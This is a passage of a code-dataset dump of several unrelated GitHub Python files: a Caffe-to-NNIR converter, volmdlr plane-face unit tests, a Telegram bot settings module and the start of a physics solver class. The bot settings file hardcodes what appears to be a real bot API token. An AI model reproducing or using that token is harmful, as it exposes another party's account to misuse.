in_name = outputNameAliasMap[in_name]\n for k in range(len(outputs)):\n splitLayerMap[caffe_name_to_ir_name(outputs[k])] = in_name\n continue\n\n layer_info_map = {}\n input_info_map = 
collections.OrderedDict()\n output_info_map = collections.OrderedDict()\n layer_info_map[\"layer_name\"] = layer_name\n if layer_type in caffe2ir_op_type:\n layer_info_map[\"layer_type\"] = caffe2ir_op_type[layer_type]\n elif layer_type == \"Pooling\":\n pool_type = layer_param.pooling_param.pool\n layer_info_map[\"layer_type\"] = \"max_pool\" if (pool_type == caffe_pb2.PoolingParameter.MAX) else \"avg_pool\"\n\n #fusing scale layer to batchnorm layer.\n #adding scale weights and biases into the batchnorm, else fusing scale to mul or muladd operator.\n elif layer_type == \"Scale\":\n scale_fused = 0\n if (verbose):\n print (\"Info: Found scale layer \" + str(layer_name))\n if (count > 0 and (count < len(layers))):\n in_name = caffe_name_to_ir_name(str(inputs[0]))\n for j in range(count-1, 0, -1):\n prev_layer_info = inputOutputMap[j]\n prev_layer_type = prev_layer_info[\"layer_type\"]\n prev_output_map = prev_layer_info[\"outputs\"]\n if (verbose):\n print(\"prev_type \" + str(prev_layer_type) + \" \" + str(in_name) + \" \" + str(prev_output_map))\n if (prev_layer_type == \"batch_norm\" and ((in_name in prev_output_map) or (in_name in outputNameAliasMap))):\n modified_out_info_map = {}\n scale_weights_map = {}\n scale_bias_map = {}\n extractBinary(layer_param, graph, verbose)\n prev_input_map = prev_layer_info[\"inputs\"]\n prev_attribute_map = prev_layer_info[\"attributes\"]\n dimList = calculateTensorDims(layer_param, prev_input_map, prev_attribute_map)\n modified_out_info_map[layer_name] = dimList[\"output\"]\n outputsMap.update(modified_out_info_map)\n prev_layer_info[\"outputs\"] = modified_out_info_map\n if (\"weights\" in dimList):\n scale_weights = layer_name + \"_w\"\n scale_weights_map[scale_weights] = dimList[\"weights\"]\n prev_layer_info[\"scale_weights\"] = scale_weights_map\n graph.addVariable(caffe_blob_to_ir_tensor(scale_weights, \"F032\", dimList[\"weights\"]))\n if (\"bias\" in dimList):\n scale_bias = layer_name + \"_b\"\n scale_bias_map[scale_bias] = dimList[\"bias\"]\n prev_layer_info[\"scale_bias\"] = scale_bias_map\n graph.addVariable(caffe_blob_to_ir_tensor(scale_bias, \"F032\", dimList[\"bias\"]))\n if(layer_name != caffe_name_to_ir_name(str(outputs[0]))):\n outputNameAliasMap[caffe_name_to_ir_name(str(outputs[0]))] = layer_name\n prev_layer_name = prev_layer_info[\"layer_name\"]\n prev_layer_info[\"layer_name\"] = layer_name\n inputOutputMap[j] = prev_layer_info\n if (verbose):\n print (prev_layer_info)\n node = caffe_node_to_ir_node(prev_layer_info[\"layer_type\"], prev_layer_info)\n graph.addNode(node)\n if (verbose):\n print (\"OK: fusing scale\" + str(layer_name) + \"to batch_norm\" + str(prev_layer_name))\n scale_fused = 1\n break\n if scale_fused == 0:\n scale_layer_type = 'mul' if len(layer_param.blobs) == 1 else 'muladd'\n if (verbose):\n print (\"OK: Fusing scale to : \" + scale_layer_type)\n layer_info_map[\"layer_type\"] = scale_layer_type\n continue\n else:\n print (\"ERROR: caffe operation %s is not supported yet.\" % (layer_type))\n sys.exit(1)\n\n # extract attributes of the layer.\n attribute_map = extractCaffeAttrInfo(layer_param)\n layer_info_map[\"attributes\"] = attribute_map\n if (layer_type == \"ReLU\" and attribute_map[\"alpha\"] != 0):\n layer_info_map[\"layer_type\"] = \"leaky_relu\"\n\n #extract input information.\n if (count == 0):\n for k in range(len(inputs)):\n in_name = caffe_name_to_ir_name(str(inputs[k]))\n if str(inputs[k]) in inputsInfo:\n input_info_map[in_name] = inputsInfo[in_name]\n elif str(inputs[k]) in splitLayerMap:\n 
inp_name = splitLayerMap[in_name]\n input_info_map[inp_name] = inputsInfo[inp_name]\n else:\n print (\"ERROR: unable to get the input dimensions for the layer %s\" % (layer_name))\n sys.exit(1)\n else:\n for k in range(len(inputs)):\n previous_layer_info = inputOutputMap[count - 1]\n prevOutMap = previous_layer_info[\"outputs\"]\n input_name = str(caffe_name_to_ir_name(str(inputs[k])))\n\n # changing the name of the input based on alias name for top==bottom in previous layer.\n if (input_name in outputNameAliasMap):\n input_name = outputNameAliasMap[input_name]\n\n if (input_name in splitLayerMap):\n input_name = splitLayerMap[input_name]\n\n if (input_name in dropoutLayerMap):\n input_name = dropoutLayerMap[input_name]\n\n # get the input dimensions.\n if input_name in prevOutMap:\n input_info_map[input_name] = prevOutMap[input_name]\n elif input_name in outputsMap:\n input_info_map[input_name] = outputsMap[input_name]\n elif input_name in inputsMap:\n input_info_map[input_name] = inputsMap[input_name]\n elif input_name in dropoutLayerMap:\n input_info_map[dropoutLayerMap[input_name]] = outputsMap[dropoutLayerMap[input_name]]\n elif input_name in splitLayerMap:\n input_info_map[splitLayerMap[input_name]] = prevOutMap[splitLayerMap[input_name]]\n elif input_name in inputsInfo:\n input_info_map[input_name] = inputsInfo[input_name]\n else:\n if (((layer_type == \"Softmax\") or (layer_type == \"SoftmaxWithLoss\")) and k != 0):\n break\n elif input_name in outputNameAliasMap:\n input_info_map[outputNameAliasMap[input_name]] = prevOutMap[outputNameAliasMap[input_name]]\n else:\n print (\"ERROR: unknown dimensions for %s in the layer %s \" % (input_name, layer_name))\n sys.exit(1)\n\n inputsMap.update(input_info_map)\n #calculate output,weight and bias dimensions.\n dimList = calculateTensorDims(layer_param, input_info_map, attribute_map)\n if (len(outputs) > 0) and caffe_name_to_ir_name(str(layer_name)) != caffe_name_to_ir_name(str(outputs[0])):\n outputNameAliasMap[caffe_name_to_ir_name(str(outputs[0]))] = caffe_name_to_ir_name(str(layer_name))\n\n output_info_map[layer_name] = dimList[\"output\"]\n outputsMap.update(output_info_map)\n\n # add inputs and outputs to layer info.\n layer_info_map[\"inputs\"] = input_info_map\n layer_info_map[\"outputs\"] = output_info_map\n\n #add weights and biases info if present into the layer info.\n extractBinary(layer_param, graph, verbose)\n weights_map = {}\n bias_map = {}\n if \"weights\" in dimList:\n weights = layer_name + '_w'\n weight_dims = dimList[\"weights\"]\n weights_map[weights] = weight_dims\n graph.addVariable(caffe_blob_to_ir_tensor(weights, \"F032\", weight_dims))\n layer_info_map[\"weights\"] = weights_map\n if \"bias\" in dimList:\n biases = layer_name + \"_b\"\n bias_dims = dimList[\"bias\"]\n bias_map[biases] = bias_dims\n graph.addVariable(caffe_blob_to_ir_tensor(biases, \"F032\", bias_dims))\n layer_info_map[\"biases\"] = bias_map\n\n inputOutputMap[count] = layer_info_map\n count += 1\n if(layer_type == \"BatchNorm\" and (i < len(layers) - 1)):\n for j in range(i+1, len(layers)-1):\n next_layer_param = layers[j]\n if(next_layer_param.type == \"Scale\" and str(next_layer_param.bottom[0]) == str(outputs[0])):\n #scaleLayerInputMap[caffe_name_to_ir_name(str(next_layer_param.name))] = caffe_name_to_ir_name(str(outputs[0]))\n break\n continue\n\n if (verbose):\n print (layer_info_map)\n node = caffe_node_to_ir_node(layer_info_map[\"layer_type\"], layer_info_map) \n graph.addNode(node)\n #add all outputs to graph \n output_name = []\n for 
i in _output_name:\n if 'name' in _output_name[i] and _output_name[i]['count'] == 0:\n output_name.append(_output_name[i]['name']) \n\n return inputOutputMap, output_name\n\n\n# convert caffe graph to ir graph.\ndef caffe_graph_to_ir_graph(net_parameter, input_dims, verbose):\n graph = ir.IrGraph(False)\n inputMap = extractInput(net_parameter, graph, input_dims)\n inputOutputMap, output_name = extractCaffeNodeInfo(net_parameter, graph, inputMap, verbose)\n outputList = extractOutput(graph, inputOutputMap, output_name, verbose)\n graph.updateLocals()\n return graph\n\n# convert caffe representation to ir representation.\ndef caffe2ir(net_parameter, input_dims, outputFolder, verbose, node_type_append):\n graph = caffe_graph_to_ir_graph(net_parameter, input_dims, verbose)\n graph.toFile(outputFolder, node_type_append)\n print (\"OK: graph successfully formed.\")\n\ndef main():\n if len(sys.argv) < 5:\n print (\"Usage : python caffe_to_nnir.py <net.caffemodel> <nnirOutputFolder> --input-dims n,c,h,w [--verbose 0|1] [--node_type_append 0|1 (optional: appends node type to output tensor name)]\")\n sys.exit(1)\n caffeFileName = sys.argv[1]\n outputFolder = sys.argv[2]\n if sys.argv[3] != '--input-dims':\n print (\"ERROR: --input-dims n,c,h,w is required.\")\n sys.exit(1)\n input_dims = sys.argv[4].split(',')\n\n verbose = 0\n #appends node type to output tensor name.\n node_type_append = 0\n pos = 5\n while pos < len(sys.argv) and sys.argv[pos][:2] == '--':\n if sys.argv[pos] == '--node_type_append':\n node_type_append = int(sys.argv[pos+1])\n pos = pos + 2\n elif sys.argv[pos] == '--verbose':\n verbose = int(sys.argv[pos+1])\n pos = pos + 2\n else:\n # Unknown flags previously looped forever; report and exit instead.\n print (\"ERROR: unknown option \" + sys.argv[pos])\n sys.exit(1)\n if (verbose):\n print (\"OK: verbose enabled.\")\n print (\"OK: loading caffemodel from %s ...\" % (caffeFileName))\n net_parameter = caffe_pb2.NetParameter()\n if not os.path.isfile(caffeFileName):\n print (\"ERROR: unable to open : \" + caffeFileName)\n sys.exit(1)\n\n if (verbose):\n print (\"parsing the caffemodel from : \" + str(caffeFileName))\n net_parameter.ParseFromString(open(caffeFileName, 'rb').read())\n print (\"OK: caffemodel read successfully\")\n print (\"converting to AMD NNIR format in %s folder ... 
\" % (outputFolder))\n if (verbose):\n print (\"input parameters obtained are : \" + str(input_dims[0]) + \" \" + str(input_dims[1]) + \" \" + str(input_dims[2]) + \" \" + str(input_dims[3]))\n\n caffe2ir(net_parameter, input_dims, outputFolder, verbose, node_type_append)\n\nif __name__ == '__main__':\n main()\n","repo_name":"GPUOpen-ProfessionalCompute-Libraries/MIVisionX","sub_path":"model_compiler/python/caffe_to_nnir.py","file_name":"caffe_to_nnir.py","file_ext":"py","file_size_in_byte":38772,"program_lang":"python","lang":"en","doc_type":"code","stars":167,"dataset":"github-code","pt":"34"} +{"seq_id":"27736184603","text":"\"\"\"\nTests for places faces\n\"\"\"\nimport math\nimport os\nimport unittest\n\nimport dessia_common.core\nimport dessia_common.core as dc\n\nimport volmdlr\nfrom volmdlr import edges, wires, faces, surfaces, curves\n\n\nfolder = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"objects_planeface_tests\")\n\n\nclass TestPlaneFace3D(unittest.TestCase):\n face_with_3holes = dc.DessiaObject.load_from_file(os.path.join(folder, 'face_with_3holes.json'))\n face = dc.DessiaObject.load_from_file(os.path.join(folder,\n 'face_to_cut_the_one_with_3holes.json'))\n plane_face_cylindricalface_intersec = dc.DessiaObject.load_from_file(\n os.path.join(folder, 'plane_face_cylindrical_face_intersec.json'))\n\n def test_area(self):\n self.assertAlmostEqual(self.face_with_3holes.area(), 0.12160000)\n\n def test_face_inside(self):\n face2 = self.face.frame_mapping(volmdlr.Frame3D(volmdlr.Point3D(0, 0, 0), volmdlr.Vector3D(0.5, 0, 0),\n volmdlr.Vector3D(0, 0.5, 0), volmdlr.Vector3D(0, 0, 0.5)), 'old')\n self.assertEqual(self.face.face_inside(face2), True)\n self.assertEqual(face2.face_inside(self.face), False)\n face1, face2 = dc.DessiaObject.load_from_file(os.path.join(folder, 'test_face_inside.json')).primitives\n self.assertTrue(face1.face_inside(face2))\n face1, face2 = dc.DessiaObject.load_from_file(os.path.join(folder, 'test_face3_face_inside.json')).primitives\n self.assertFalse(face1.face_inside(face2))\n\n def test_face_intersections_with_holes(self):\n face_intersections = self.face.face_intersections(self.face_with_3holes)\n self.assertEqual(len(face_intersections), 4)\n\n def test_line_intersections(self):\n line_inside_hole = curves.Line3D(volmdlr.Point3D(0.1, 0.0, -.3), volmdlr.Point3D(-0.1, 0.0, 0.3))\n line_inside_face = curves.Line3D(volmdlr.Point3D(-0.05, 0.0, -.3), volmdlr.Point3D(-0.1, 0.0, 0.3))\n self.assertEqual([], self.face_with_3holes.line_intersections(line_inside_hole))\n self.assertEqual(1, len(self.face_with_3holes.line_intersections(line_inside_face)))\n\n def test_divide_face(self):\n face_intersections = self.face.face_intersections(self.face_with_3holes)\n cutting_contours = self.face_with_3holes.get_face_cutting_contours(\n {(self.face, self.face_with_3holes): face_intersections})\n new_faces = self.face_with_3holes.divide_face(cutting_contours)\n self.assertEqual(len(new_faces), 2)\n cutting_contour = wires.Wire2D.from_points([\n volmdlr.Point2D(0.5, 1.), volmdlr.Point2D(0.5, 0.75),\n volmdlr.Point2D(1, 0.75), volmdlr.Point2D(1, 1), volmdlr.Point2D(1.25, 1),\n volmdlr.Point2D(1.25, 1.5), volmdlr.Point2D(1, 1.5)\n ])\n face_tobe_divided = dc.DessiaObject.load_from_file(os.path.join(folder, 'face_tobe_divided.json'))\n divided_faces = face_tobe_divided.divide_face([cutting_contour])\n self.assertEqual(len(divided_faces), 4)\n expected_areas = [0.125, 1.4320458460875176, 0.05704584608751772, 0.125]\n for i, face in enumerate(divided_faces):\n 
self.assertAlmostEqual(expected_areas[i], face.area())\n source_folder = os.path.join(folder, 'test_planeface_divide_face_json_files')\n expected_faces_areas = [[0.0055788043593624215, 0.23430978309161565, 0.005578804359415823, 0.0948396741089057],\n [0.0855613934860544, 0.032085522557644186, 0.01069517418574345],\n [0.002005345159845676, 0.002005345159820638, 0.0033422419331328506,\n 0.0006684483866419249], [0.3403070659192998, 0.005578804359415823],\n [0.0427806967433878, 0.010695174185850198, 0.08556139348605463],\n [0.07754001284661505, 0.002673793546460905]]\n file_names = ['test_face_divide_face5.json', 'test_face_divide_face2.json',\n 'test_planeface3d_divide_face.json', 'test_face_divide_face3.json', 'test_face_divide_face.json',\n 'test_face_divide_face6.json']\n faces_areas = []\n for filename in file_names:\n file_path = os.path.join(source_folder, filename)\n obj = dc.DessiaObject.load_from_file(file_path)\n face = obj.primitives[0]\n list_cutting_contours = obj.primitives[1:]\n divide_faces = face.divide_face(list_cutting_contours)\n areas = [face.area() for face in divide_faces]\n faces_areas.append(areas)\n for solution, expected_solution in zip(faces_areas, expected_faces_areas):\n self.assertEqual(len(solution), len(expected_solution))\n for solution_area, expected_solution_area in zip(solution, expected_solution):\n self.assertAlmostEqual(solution_area, expected_solution_area)\n\n def test_set_operations_new_faces(self):\n volumemodel = dessia_common.core.DessiaObject.load_from_file(\n os.path.join(folder, 'test_set_operations_new_faces.json'))\n plane_face, cutting_contours3d = volumemodel.primitives[0], volumemodel.primitives[1:]\n divide_face = plane_face.set_operations_new_faces({(plane_face, plane_face): cutting_contours3d})\n divide_face = sorted(divide_face, key=lambda face: face.area())\n self.assertEqual(len(divide_face), 7)\n expected_areas = [0.05000000000000002, 0.25, 0.4375, 0.5, 1.0621681469282045, 1.29875, 2.4002627208849607]\n areas = [f.area() for f in divide_face]\n for area, expected_area in zip(areas, expected_areas):\n self.assertAlmostEqual(area, expected_area, 6)\n\n def test_cylindricalface_intersections(self):\n R = 0.15\n cylindricalsurface = surfaces.CylindricalSurface3D(volmdlr.OXYZ, R)\n face = faces.CylindricalFace3D.from_surface_rectangular_cut(cylindricalsurface, 0, volmdlr.TWO_PI, -.25, .25)\n \"\"\" ========== CIRCLE3D =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi / 2)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(len(face_intersections), 1)\n self.assertIsInstance(face_intersections[0].primitives[0], edges.FullArc3D)\n self.assertEqual(face_intersections[0].primitives[0].circle.center, volmdlr.O3D)\n self.assertEqual(face_intersections[0].primitives[0].circle.radius, 0.15)\n \"\"\" ========== FULL ELLIPSE3D =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi / 4)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(len(face_intersections), 1)\n self.assertIsInstance(face_intersections[0].primitives[0], edges.FullArcEllipse3D)\n self.assertEqual(face_intersections[0].primitives[0].ellipse.center, volmdlr.O3D)\n self.assertAlmostEqual(face_intersections[0].primitives[0].ellipse.major_axis, 0.21213203435596426)\n self.assertTrue(face_intersections[0].primitives[0].ellipse.major_dir.is_close(\n volmdlr.Vector3D(0, -0.7071067811865475, 
0.7071067811865475)))\n \"\"\" ========== THREE ARC ELLIPSES =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi / 7)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(len(face_intersections), 3)\n for inter in face_intersections:\n self.assertIsInstance(inter.primitives[0], edges.ArcEllipse3D)\n self.assertEqual(face_intersections[0].primitives[0].ellipse.center, volmdlr.O3D)\n self.assertTrue(face_intersections[0].primitives[0].ellipse.major_dir.is_close(volmdlr.Point3D(\n 2.6567716615652136e-17, -0.4338837391180807, 0.9009688679021675)))\n self.assertAlmostEqual(face_intersections[0].primitives[0].ellipse.major_axis, 0.3457147306439571)\n list_expected_points = [[volmdlr.Point3D(0.08947272158306664, -0.12039365470206077, 0.25),\n volmdlr.Point3D(0.136637076048, -0.061889493851, 0.128514858204),\n volmdlr.Point3D(0.15, -0.0, 0.0)],\n [volmdlr.Point3D(0.15, -0.0, 0.0),\n volmdlr.Point3D(0.136637075473, 0.06188949512, -0.128514860839),\n volmdlr.Point3D(0.08947272158306664, 0.12039365470206077, -0.25)],\n [volmdlr.Point3D(-0.08947272158306664, 0.12039365470206077, -0.25),\n volmdlr.Point3D(-0.15, 0, 0),\n volmdlr.Point3D(-0.08947272158306664, -0.12039365470206077, 0.25)]]\n for expected_points, wire in zip(list_expected_points, face_intersections):\n arcellipse = wire.primitives[0]\n self.assertTrue(expected_points[0].is_close(arcellipse.start))\n self.assertTrue(expected_points[1].is_close(arcellipse.middle_point()))\n self.assertTrue(expected_points[2].is_close(arcellipse.end))\n \"\"\" ========== TWO PARALLEL LINES =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.rotation(volmdlr.O3D, volmdlr.X3D, math.pi)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(face_intersections[0].primitives[0], edges.LineSegment3D(volmdlr.Point3D(0.15, 0.0, -0.25),\n volmdlr.Point3D(0.15, 0.0, 0.25)))\n self.assertEqual(face_intersections[1].primitives[0], edges.LineSegment3D(volmdlr.Point3D(-0.15, 0.0, -0.25),\n volmdlr.Point3D(-0.15, 0.0, 0.25)))\n \"\"\" ========== ONE LINE =========\"\"\"\n plane_face_3 = self.plane_face_cylindricalface_intersec.translation(R * volmdlr.Y3D)\n face_intersections = plane_face_3.face_intersections(face)\n self.assertEqual(face_intersections[0].primitives[0], edges.LineSegment3D(volmdlr.Point3D(0.0, 0.15, -0.25),\n volmdlr.Point3D(0.0, 0.15, 0.25)))\n\n def test_conical_face_intersections(self):\n def get_face(plane, x1=-1, x2=1, y1=-1, y2=1):\n return faces.PlaneFace3D.from_surface_rectangular_cut(plane, x1, x2, y1, y2)\n conical_surface = surfaces.ConicalSurface3D(volmdlr.OXYZ, math.pi / 6)\n conical_face = faces.ConicalFace3D.from_surface_rectangular_cut(conical_surface,\n 0, 1.5 * math.pi, 0., 1)\n \"\"\"======== Arc3D =========\"\"\"\n plane1 = surfaces.Plane3D(volmdlr.Frame3D(volmdlr.Point3D(0, 0, 0.5),\n volmdlr.X3D, volmdlr.Y3D, volmdlr.Z3D))\n face = get_face(plane1)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 1)\n self.assertIsInstance(intersections[0].primitives[0], edges.Arc3D)\n self.assertAlmostEqual(intersections[0].length(), 1.360349523175663)\n \"\"\"========= Hyperbola (BSpline3D) =======\"\"\"\n plane2 = surfaces.Plane3D(\n volmdlr.Frame3D(volmdlr.Point3D(0, 0.25, 0.5), volmdlr.Z3D, volmdlr.X3D, volmdlr.Y3D))\n face = get_face(plane2)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 1)\n 
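The expected axis lengths in the cylindrical-face tests above follow from elementary geometry: after rotating the cutting plane by an angle alpha about X, the slice of a radius-R cylinder is an ellipse with semi-major axis R / sin(alpha), and alpha = pi/2 degenerates to the circle. A quick numeric check of the constants used in the assertions:

```python
import math

R = 0.15  # cylinder radius used in the tests above

assert math.isclose(R / math.sin(math.pi / 2), 0.15)                 # circle case
assert math.isclose(R / math.sin(math.pi / 4), 0.21213203435596426)  # pi/4 tilt
assert math.isclose(R / math.sin(math.pi / 7), 0.3457147306439571)   # pi/7 tilt
```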
self.assertIsInstance(intersections[0].primitives[0], edges.BSplineCurve3D)\n self.assertAlmostEqual(intersections[0].length(), 1.5797706721593943)\n\n \"\"\"============== Two LineSegments ===================\"\"\"\n plane3 = surfaces.Plane3D(volmdlr.Frame3D(volmdlr.Point3D(0, 0.0, 0.5),\n volmdlr.Z3D, volmdlr.X3D, volmdlr.Y3D))\n face = get_face(plane3)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 2)\n self.assertIsInstance(intersections[0].primitives[0], edges.LineSegment3D)\n self.assertAlmostEqual(intersections[0].length(), 1.1547005383794386)\n self.assertAlmostEqual(intersections[1].length(), 1.1547005383794386)\n \"\"\"===================== Ellipse 3D =============================\"\"\"\n vector1 = volmdlr.Vector3D(1, 1, 1)\n vector1 = vector1.unit_vector()\n vector2 = vector1.deterministic_unit_normal_vector()\n vector3 = vector1.cross(vector2)\n frame = volmdlr.Frame3D(volmdlr.Point3D(0, 0, 0.5), vector1, vector2, vector3)\n plane4 = surfaces.Plane3D(frame)\n face = get_face(plane4)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 2)\n self.assertIsInstance(intersections[0].primitives[0], edges.ArcEllipse3D)\n self.assertIsInstance(intersections[1].primitives[0], edges.ArcEllipse3D)\n self.assertAlmostEqual(intersections[0].length(), 0.7233023692399578)\n self.assertAlmostEqual(intersections[1].length(), 1.1339664625179093, 6)\n \"\"\"================== Parabola ====================\"\"\"\n point1 = conical_surface.frame.origin\n point2 = conical_surface.frame.local_to_global_coordinates(\n volmdlr.Point3D(10 * math.tan(conical_surface.semi_angle), 0, 10))\n generatrix = edges.LineSegment3D(point1, point2)\n normal = generatrix.unit_normal_vector()\n plane_origin = frame.origin - normal * .5\n plane5 = surfaces.Plane3D.from_normal(plane_origin, normal)\n face = get_face(plane5)\n intersections = face.face_intersections(conical_face)\n self.assertEqual(len(intersections), 1)\n self.assertIsInstance(intersections[0].primitives[0], edges.BSplineCurve3D)\n self.assertAlmostEqual(intersections[0].length(), 1.19097843887217)\n\n def test_linesegment_inside(self):\n lineseg = volmdlr.edges.LineSegment3D(volmdlr.Point3D(0.2, 0, -0.2), volmdlr.Point3D(0.1, 0.0, 0.2))\n self.assertTrue(self.plane_face_cylindricalface_intersec.linesegment_inside(lineseg))\n lineseg1 = volmdlr.edges.LineSegment3D(volmdlr.Point3D(0.2, 0, -0.2), volmdlr.Point3D(0.1, 0.1, 0.2))\n self.assertFalse(self.plane_face_cylindricalface_intersec.linesegment_inside(lineseg1))\n\n def test_circle_inside(self):\n circle = curves.Circle3D(volmdlr.OZXY, 0.1)\n self.assertTrue(self.plane_face_cylindricalface_intersec.circle_inside(circle))\n circle2 = curves.Circle3D(volmdlr.OYZX, 0.1)\n self.assertFalse(self.plane_face_cylindricalface_intersec.circle_inside(circle2))\n\n def test_merges_faces(self):\n source_folder = os.path.join(folder, 'test_planeface3d_merge_faces_json_files')\n faces_areas = []\n file_names = ['test_merge_faces4.json', 'test_merge_faces5.json', 'faces_merge_faces2.json',\n 'faces_merge_faces3.json', 'faces_merge_faces4.json']\n for filename in file_names:\n file_path = os.path.join(source_folder, filename)\n obj = dc.DessiaObject.load_from_file(file_path)\n faces_ = obj.primitives\n merged_faces = faces.PlaneFace3D.merge_faces(faces_)\n areas = []\n for face in merged_faces:\n areas.append(face.area())\n faces_areas.append(areas)\n expected_faces_areas = [[0.1621764423452034], [0.15508002569387766],\n 
[0.005347587092921799, 0.032085522557310564, 0.18181796115851334],\n [0.08021380639307588],\n [0.05578804359331602, 0.005578804359362449, 0.011157608718620371,\n 0.022315217437398727, 0.05020923923410867]]\n for solution, expected_solution in zip(faces_areas, expected_faces_areas):\n self.assertEqual(len(solution), len(expected_solution))\n for solution_area, expected_solution_area in zip(solution, expected_solution):\n self.assertAlmostEqual(solution_area, expected_solution_area)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Dessia-tech/volmdlr","sub_path":"tests/faces/test_planeface3d.py","file_name":"test_planeface3d.py","file_ext":"py","file_size_in_byte":16321,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"34"} +{"seq_id":"21486050301","text":"import psycopg2\r\nimport os, sys\r\n\r\nPROJECT_ROOT = os.path.dirname(__file__)\r\nprint(PROJECT_ROOT)\r\nsys.path.insert(0, os.path.join(PROJECT_ROOT, 'users'))\r\n\r\n# connect to the database\r\nconn = psycopg2.connect(dbname='', user='',\r\n password='', host='')\r\ncursor = conn.cursor() # we will work with it through a cursor\r\n\r\nBotToken = '928197350:AAH5MzOU1Iwtb02v1xjYDloygFKFgefIePU' # this is the API token of the @mse_soft_u_bot bot\r\n\r\n# -------------------------ALL MAIN TEXT STRINGS ------------------------------------------------------------\r\n\r\ntext_starter = \"Hi! My name is MSE-MSU BOT \" + '\\n \\n' + 'Through me you can check the SCHEDULE for the academic week, ' \\r\n '\\n you can mark yourself present at a class ' \\r\n '(if you are actually attending it, of course), ' \\r\n 'and even look up the HOMEWORK.\\n \\n' \\r\n 'You can learn more about the project ' \\r\n 'by pressing the \"About us\" button. '\r\n\r\ntext_info = '\\U00002139 A little about us!' \\r\n '\\n\\nWe launched our bot-building project quite a while ago. To this day, many institutes have a poorly ' \\r\n 'developed system for displaying schedules.' \\r\n ' To look at the current schedule, you have to open the website and then download an inconvenient table.' \\r\n '\\n\\nBecause of this, we decided to put together a team of developers who could ' \\r\n 'turn university schedules into a couple of buttons. ' \\r\n 'Our bots have already proven themselves on the market. They are known for their ease of use.' \\r\n '\\n\\nYou can buy our software at softwareu.ru!'
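The blank `psycopg2.connect` arguments above are deliberate placeholders. A common way to fill them without committing credentials to the repository is to read them from the environment; a sketch (the variable names are assumptions, not this project's configuration):

```python
import os
import psycopg2

# Sketch only: environment variable names are hypothetical.
conn = psycopg2.connect(dbname=os.environ["BOT_DB_NAME"],
                        user=os.environ["BOT_DB_USER"],
                        password=os.environ["BOT_DB_PASSWORD"],
                        host=os.environ.get("BOT_DB_HOST", "localhost"))
```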
\r\n\r\ntext_help = 'Support contacts:\\n\\n\\U0000260E' \\r\n 'Phone: +7(964)723-56-82\\n\\U0001F4E7' \\r\n 'Email: #our_corporate_email\\n\\U0001F468\\U0000200D\\U0001F4BB' \\r\n 'Technical director - @grom_1337'\r\n\r\ngroupe_list = ['101', '102', '103', '104', '201', '202', '203', '204', '301', '302', '303', '304', '401', '402',\r\n '403', '404', '501', '502']\r\n\r\ngroupe_list_2 = ['100', '101', '102', '103', '104', '200', '201', '202', '203', '204', '300', '301',\r\n '302', '303', '304', '400', '401',\r\n '402',\r\n '403', '404', '500', '501', '502']\r\n\r\n\r\ndef subject_list():\r\n cursor.execute(\"SELECT ОГД FROM table_info\")\r\n subjects_1 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n cursor.execute(\"SELECT ЭММЭ FROM table_info\")\r\n subjects_2 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n cursor.execute(\"SELECT ЭиФС FROM table_info\")\r\n subjects_3 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n cursor.execute(\"SELECT ОЭТ FROM table_info\")\r\n subjects_4 = [item[0] for item in cursor.fetchall()]\r\n conn.commit()\r\n\r\n subjects = subjects_1 + subjects_2 + subjects_3 + subjects_4\r\n\r\n result = list(filter(None, subjects))\r\n\r\n return result # removes all None entries from the list\r\n\r\n\r\n# print(subject_list())\r\n# print(subject_list())\r\n","repo_name":"digitalstudsovetmsu/bots_tg","sub_path":"SoftUbot/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
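Stepping back to `subject_list` above: since all four columns live in `table_info`, the four round-trips can usually be collapsed into a single query. A sketch of that variant, reusing the module-level `cursor` and `conn` (equivalent behavior assumed; the Cyrillic column identifiers are kept as-is):

```python
def subject_list_single_query():
    # One round-trip instead of four separate SELECTs.
    cursor.execute("SELECT ОГД, ЭММЭ, ЭиФС, ОЭТ FROM table_info")
    rows = cursor.fetchall()
    conn.commit()
    # Flatten the row tuples and drop NULL (None) entries.
    return [cell for row in rows for cell in row if cell is not None]
```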
 +{"seq_id":"17005034719","text":"#!/usr/bin/env python3\nfrom reconstruct_data import ReconstructData\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\n\nclass Fields:\n #########################################################################\n # Description:\n # Solution handling class. Here, the physical variables and conserved\n # hydro quantities are initialized and stored. General functions\n # common to several different steps in this algorithm are defined here\n # for easy and consistent access. Functions pertaining to solving the\n # actual physics equations are located in their respective classes\n # corresponding to the step of the algorithm.\n #########################################################################\n def __init__(self, rh):\n self.rh = rh\n self.inp = rh.inp\n self.mat = rh.mat\n self.geo = rh.geo\n \n # Init density storage\n self.rho = self.initializeAtCenters(self.inp.rho)\n self.rho_n = np.copy(self.rho)\n self.rho_old = np.copy(self.rho)\n\n # Init velocity storage\n self.u = self.initializeAtCenters(self.inp.u)\n self.u_n = np.copy(self.u)\n self.u_old = np.copy(self.u)\n \n # Init temperature storage\n self.T = self.initializeAtCenters(self.inp.T)\n self.T_n = np.copy(self.T)\n self.T_old = np.copy(self.T)\n \n # Init specific internal energy storage\n self.e = self.inp.C_v * self.T\n self.e_n = np.copy(self.e)\n self.e_old = np.copy(self.e)\n \n # Init pressure 